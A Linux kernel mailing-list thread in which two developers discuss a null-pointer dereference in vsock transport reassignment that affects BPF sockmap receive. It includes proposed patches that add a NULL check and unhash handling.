> > problem for us, it only shifts it.
>
> Got it. I assumed this issue would be solved by `vsk->transport !=
> &t->transport` in the critical place(s).
>
> (Note that BPF doesn't care if transport has changed; BPF just expects to
> have _a_ transport.)
>
> >> If I'm not mistaken, that would require rewriting vsock_assign_transport()
> >> so that a new transport is assigned only once fully initialized, otherwise
> >> keep the old one (still unhurt and functional) and return error. Because
> >> failing connect() should not change anything under the hood, right?
> >>
> >
> > Nope, connect should be able to change the transport.
> >
> > Because a user can do an initial connect() that requires a specific
> > transport, this one fails maybe because there's no peer with that cid.
> > Then the user can redo the connect() to a different cid that requires
> > a different transport.
>
> But the initial connect() failing does not change anything under the hood
> (transport should/could stay NULL).

Nope, isn't null, it's assigned to a transport, because for example it
has to send a packet to connect to the remote CID and wait back for a
response that for example says the CID doesn't exist.

> Then a successful re-connect assigns
> the transport (NULL -> non-NULL). And it's all good because all I wanted to
> avoid (because of BPF) was non-NULL -> NULL. Anyway, that's my possibly
> shallow understanding :)
>
Michal Luczaj Dec. 19, 2024, 4:09 p.m. UTC | #13
On 12/19/24 16:12, Stefano Garzarella wrote:
> On Thu, 19 Dec 2024 at 16:05, Michal Luczaj <mhal@rbox.co> wrote:
>>
>> On 12/19/24 15:48, Stefano Garzarella wrote:
>>> On Thu, 19 Dec 2024 at 15:36, Michal Luczaj <mhal@rbox.co> wrote:
>>>>
>>>> On 12/19/24 09:19, Stefano Garzarella wrote:
>>>>> ...
>>>>> I think the best thing though is to better understand how to handle
>>>>> deassign, rather than checking everywhere that it's not null, also
>>>>> because in some cases (like the one in virtio-vsock), it's also
>>>>> important that the transport is the same.
>>>>
>>>> My vote would be to apply your virtio_transport_recv_pkt() patch *and* make
>>>> it impossible-by-design to switch ->transport from non-NULL to NULL in
>>>> vsock_assign_transport().
>>>
>>> I don't know if that's enough, in this case the problem is that some
>>> response packets are intended for a socket, where the transport has
>>> changed. So whether it's null or assigned but different, it's still a
>>> problem we have to handle.
>>>
>>> So making it impossible for the transport to be null, but allowing it
>>> to be different (we can't prevent it from changing), doesn't solve the
>>> problem for us, it only shifts it.
>>
>> Got it. I assumed this issue would be solved by `vsk->transport !=
>> &t->transport` in the critical place(s).
>>
>> (Note that BPF doesn't care if transport has changed; BPF just expects to
>> have _a_ transport.)
>>
>>>> If I'm not mistaken, that would require rewriting vsock_assign_transport()
>>>> so that a new transport is assigned only once fully initialized, otherwise
>>>> keep the old one (still unhurt and functional) and return error. Because
>>>> failing connect() should not change anything under the hood, right?
>>>>
>>>
>>> Nope, connect should be able to change the transport.
>>>
>>> Because a user can do an initial connect() that requires a specific
>>> transport, this one fails maybe because there's no peer with that cid.
>>> Then the user can redo the connect() to a different cid that requires
>>> a different transport.
>>
>> But the initial connect() failing does not change anything under the hood
>> (transport should/could stay NULL).
> 
> Nope, isn't null, it's assigned to a transport, because for example it
> has to send a packet to connect to the remote CID and wait back for a
> response that for example says the CID doesn't exist.

Ahh, I think I get it. So the initial connect() passed
vsock_assign_transport() successfully and then failed deeper in
vsock_connect(), right? That's fine. Let the socket have a useless
transport (a valid pointer nevertheless). Sure, upcoming connect() can
assign a new (possibly useless just as well) transport, but there's no
reason to allow ->transport becoming NULL.

And a pre-connect socket (where ->transport==NULL) is not an issue, because
BPF won't let it in any sockmap, so vsock_bpf_recvmsg() won't be reachable.

Anywa, thanks for explaining,
Michal

PS. Or ignore the above and remove the socket from the sockmap at every
reconnect? Possible unhash abuse:

diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
index 5cf8109f672a..8a65153ee186 100644
--- a/net/vmw_vsock/af_vsock.c
+++ b/net/vmw_vsock/af_vsock.c
@@ -483,6 +483,10 @@ int vsock_assign_transport(struct vsock_sock *vsk, struct vsock_sock *psk)
 		if (vsk->transport == new_transport)
 			return 0;
 
+		const struct proto *prot = READ_ONCE(sk->sk_prot);
+		if (prot->unhash)
+			prot->unhash(sk);
+
 		/* transport->release() must be called with sock lock acquired.
 		 * This path can only be taken during vsock_connect(), where we
 		 * have already held the sock lock. In the other cases, this
diff --git a/net/vmw_vsock/vsock_bpf.c b/net/vmw_vsock/vsock_bpf.c
index 4aa6e74ec295..80deb4d70aea 100644
--- a/net/vmw_vsock/vsock_bpf.c
+++ b/net/vmw_vsock/vsock_bpf.c
@@ -119,6 +119,7 @@ static void vsock_bpf_rebuild_protos(struct proto *prot, const struct proto *bas
 	*prot        = *base;
 	prot->close  = sock_map_close;
 	prot->recvmsg = vsock_bpf_recvmsg;
+	prot->unhash = sock_map_unhash;
 	prot->sock_is_readable = sk_msg_is_readable;
 }

>> Then a successful re-connect assigns
>> the transport (NULL -> non-NULL). And it's all good because all I wanted to
>> avoid (because of BPF) was non-NULL -> NULL. Anyway, that's my possibly
>> shallow understanding :)
Stefano Garzarella Dec. 20, 2024, 10:49 a.m. UTC | #14
On Thu, Dec 19, 2024 at 05:09:42PM +0100, Michal Luczaj wrote:
>On 12/19/24 16:12, Stefano Garzarella wrote:
>> On Thu, 19 Dec 2024 at 16:05, Michal Luczaj <mhal@rbox.co> wrote:
>>>
>>> On 12/19/24 15:48, Stefano Garzarella wrote:
>>>> On Thu, 19 Dec 2024 at 15:36, Michal Luczaj <mhal@rbox.co> wrote:
>>>>>
>>>>> On 12/19/24 09:19, Stefano Garzarella wrote:
>>>>>> ...
>>>>>> I think the best thing though is to better understand how to handle
>>>>>> deassign, rather than checking everywhere that it's not null, also
>>>>>> because in some cases (like the one in virtio-vsock), it's also
>>>>>> important that the transport is the same.
>>>>>
>>>>> My vote would be to apply your virtio_transport_recv_pkt() patch *and* make
>>>>> it impossible-by-design to switch ->transport from non-NULL to NULL in
>>>>> vsock_assign_transport().
>>>>
>>>> I don't know if that's enough, in this case the problem is that some
>>>> response packets are intended for a socket, where the transport has
>>>> changed. So whether it's null or assigned but different, it's still a
>>>> problem we have to handle.
>>>>
>>>> So making it impossible for the transport to be null, but allowing it
>>>> to be different (we can't prevent it from changing), doesn't solve the
>>>> problem for us, it only shifts it.
>>>
>>> Got it. I assumed this issue would be solved by `vsk->transport !=
>>> &t->transport` in the critical place(s).
>>>
>>> (Note that BPF doesn't care if transport has changed; BPF just expects to
>>> have _a_ transport.)
>>>
>>>>> If I'm not mistaken, that would require rewriting vsock_assign_transport()
>>>>> so that a new transport is assigned only once fully initialized, otherwise
>>>>> keep the old one (still unhurt and functional) and return error. Because
>>>>> failing connect() should not change anything under the hood, right?
>>>>>
>>>>
>>>> Nope, connect should be able to change the transport.
>>>>
>>>> Because a user can do an initial connect() that requires a specific
>>>> transport, this one fails maybe because there's no peer with that cid.
>>>> Then the user can redo the connect() to a different cid that requires
>>>> a different transport.
>>>
>>> But the initial connect() failing does not change anything under the hood
>>> (transport should/could stay NULL).
>>
>> Nope, isn't null, it's assigned to a transport, because for example it
>> has to send a packet to connect to the remote CID and wait back for a
>> response that for example says the CID doesn't exist.
>
>Ahh, I think I get it. So the initial connect() passed
>vsock_assign_transport() successfully and then failed deeper in
>vsock_connect(), right? That's fine. Let the socket have a useless
>transport (a valid pointer nevertheless). 

Just to be clear, it's not useless, since it's used to make the 
connection. We know that it's useless just when we report that the 
connection failed, so maybe we should de-assign it when we set 
`sock->state = SS_UNCONNECTED`.

>Sure, upcoming connect() can
>assign a new (possibly useless just as well) transport, but there's no
>reason to allow ->transport becoming NULL.

I'm not sure about this, in the end in the connection failure case, when 
we set `sock->state = SS_UNCONNECTED`, we're returning the socket to a 
pre-connect state, so it might make sense to also reset the transport to 
NULL, so that we have exactly the same conditions.

>
>And a pre-connect socket (where ->transport==NULL) is not an issue, because
>BPF won't let it in any sockmap, so vsock_bpf_recvmsg() won't be reachable.
>
>Anywa, thanks for explaining,
>Michal
>
>PS. Or ignore the above and remove the socket from the sockmap at every
>reconnect? Possible unhash abuse:

I should take a closer look at unhash, but it might make sense!

>
>diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
>index 5cf8109f672a..8a65153ee186 100644
>--- a/net/vmw_vsock/af_vsock.c
>+++ b/net/vmw_vsock/af_vsock.c
>@@ -483,6 +483,10 @@ int vsock_assign_transport(struct vsock_sock *vsk, struct vsock_sock *psk)
> 		if (vsk->transport == new_transport)
> 			return 0;
>
>+		const struct proto *prot = READ_ONCE(sk->sk_prot);
>+		if (prot->unhash)
>+			prot->unhash(sk);
>+
> 		/* transport->release() must be called with sock lock acquired.
> 		 * This path can only be taken during vsock_connect(), where we
> 		 * have already held the sock lock. In the other cases, this
>diff --git a/net/vmw_vsock/vsock_bpf.c b/net/vmw_vsock/vsock_bpf.c
>index 4aa6e74ec295..80deb4d70aea 100644
>--- a/net/vmw_vsock/vsock_bpf.c
>+++ b/net/vmw_vsock/vsock_bpf.c
>@@ -119,6 +119,7 @@ static void vsock_bpf_rebuild_protos(struct proto *prot, const struct proto *bas
> 	*prot        = *base;
> 	prot->close  = sock_map_close;
> 	prot->recvmsg = vsock_bpf_recvmsg;
>+	prot->unhash = sock_map_unhash;
> 	prot->sock_is_readable = sk_msg_is_readable;
> }
>
>>> Then a successful re-connect assigns
>>> the transport (NULL -> non-NULL). And it's all good because all I wanted to
>>> avoid (because of BPF) was non-NULL -> NULL. Anyway, that's my possibly
>>> shallow understanding :)
>

Note that non-NULL -> NULL should only occur before a connection is 
established, so before any data is passed. Is this a problem for BPF?

Thanks,
Stefano
Michal Luczaj Dec. 20, 2024, 2:34 p.m. UTC | #15
On 12/20/24 11:49, Stefano Garzarella wrote:
> ...
> Note that non-NULL -> NULL should only occur before a connection is 
> established, so before any data is passed. Is this a problem for BPF?

Please take a look at vsock_bpf_update_proto(). The condition is to have a
transport assigned. BPF assumes transport will stay valid.

And currently that's a wrong assumption: transport can transition from
non-NULL to NULL (due to a failed reconnect). That's why we hit null ptr
deref via vsock_bpf_recvmsg().

That said, I sure hope someone BPF-competent is reading this :)
diff mbox series

Patch

diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
index 5cf8109f672a..a0c008626798 100644
--- a/net/vmw_vsock/af_vsock.c
+++ b/net/vmw_vsock/af_vsock.c
@@ -870,6 +870,9 @@  EXPORT_SYMBOL_GPL(vsock_create_connected);
 
 s64 vsock_stream_has_data(struct vsock_sock *vsk)
 {
+	if (!vsk->transport)
+		return 0;
+
 	return vsk->transport->stream_has_data(vsk);
 }
 EXPORT_SYMBOL_GPL(vsock_stream_has_data);